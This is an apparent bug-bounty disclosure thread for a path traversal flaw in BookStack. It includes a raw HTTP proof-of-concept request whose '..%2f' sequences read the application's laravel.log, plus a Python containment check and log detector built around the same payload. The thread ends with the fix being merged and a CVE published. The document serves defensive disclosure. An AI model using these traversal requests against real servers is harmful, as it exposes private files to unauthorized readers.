Path Traversal in bookstackapp/bookstack

Valid

Reported on

Oct 30th 2021


Description

While reading the recent BookStack source code (85dc8d), I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1


Impact

Read log files whose paths are predictable.
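As an added example (not BookStack's own code, and not the fix merged in 43830a), the containment check a file-serving route needs, exercised against the request path from the proof of concept, plus a detector for the same traversal pattern in web-server access log lines. The storage layout and the log lines are constructed for the example.

```python
from __future__ import annotations
import re
from pathlib import Path
from urllib.parse import unquote

# Storage root laid out like the report's target: images under uploads/,
# logs beside them (constructed path, not from any real deployment).
STORAGE = "/var/www/bookstack/storage"
IMAGE_DIR = f"{STORAGE}/uploads/images"


def resolve_within(base_dir: str, requested: str) -> Path | None:
    """Return the on-disk path for `requested` only if it stays inside
    `base_dir`; return None for anything that escapes after decoding."""
    base = Path(base_dir).resolve()
    # Decode exactly once, as the web server does: a double-encoded
    # `..%252f` then stays a literal file name inside the base. Strip
    # leading slashes so the join cannot replace the base outright.
    decoded = unquote(requested).replace("\\", "/").lstrip("/")
    # `..` segments collapse during resolution, so an escaping request
    # lands outside the base and fails the containment check.
    candidate = (base / decoded).resolve()
    return candidate if candidate.is_relative_to(base) else None


# Traversal sequence, raw or percent-encoded, followed by a separator.
TRAVERSAL = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)", re.IGNORECASE)


def flag_traversal_requests(log_lines: list[str]) -> list[str]:
    """Return request URIs from access log lines that carry a traversal
    sequence either as written or after one URL decode."""
    hits = []
    for line in log_lines:
        match = re.search(r'"(?:GET|HEAD|POST) (\S+)', line)
        if match is None:
            continue
        uri = match.group(1)
        if TRAVERSAL.search(uri) or TRAVERSAL.search(unquote(uri)):
            hits.append(uri)
    return hits


# Constructed access log lines in common log format, not from the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Oct/2021:10:01:02 +0000] "GET /uploads/images/gallery/2021-10/photo.png HTTP/1.1" 200 5120',
    '10.0.0.5 - - [30/Oct/2021:10:01:09 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 88012',
    '10.0.0.7 - - [30/Oct/2021:10:02:41 +0000] "GET /uploads/images/%2e%2e/%2e%2e/logs/laravel.log HTTP/1.1" 200 88012',
]
```

The reported request resolves to `storage/logs/laravel.log`, which lies outside the image directory, so `resolve_within` returns None for it while an ordinary image path under the base is returned unchanged.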

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a month ago
Dan Brown
a month ago

Maintainer


Thank you so much again @theworstcomrade. Have verified on my own instance. Looks like there is some level of webserver protection that prevents this going too far up, which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability a month ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown confirmed that a fix has been merged on 43830a a month ago
Dan Brown has been awarded the fix bounty
ImageController.php#L38 has been validated
theworstcomrade
a month ago

Researcher


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank you also for the bounty.

Jamie Slome
a month ago

Admin


CVE published! 🎊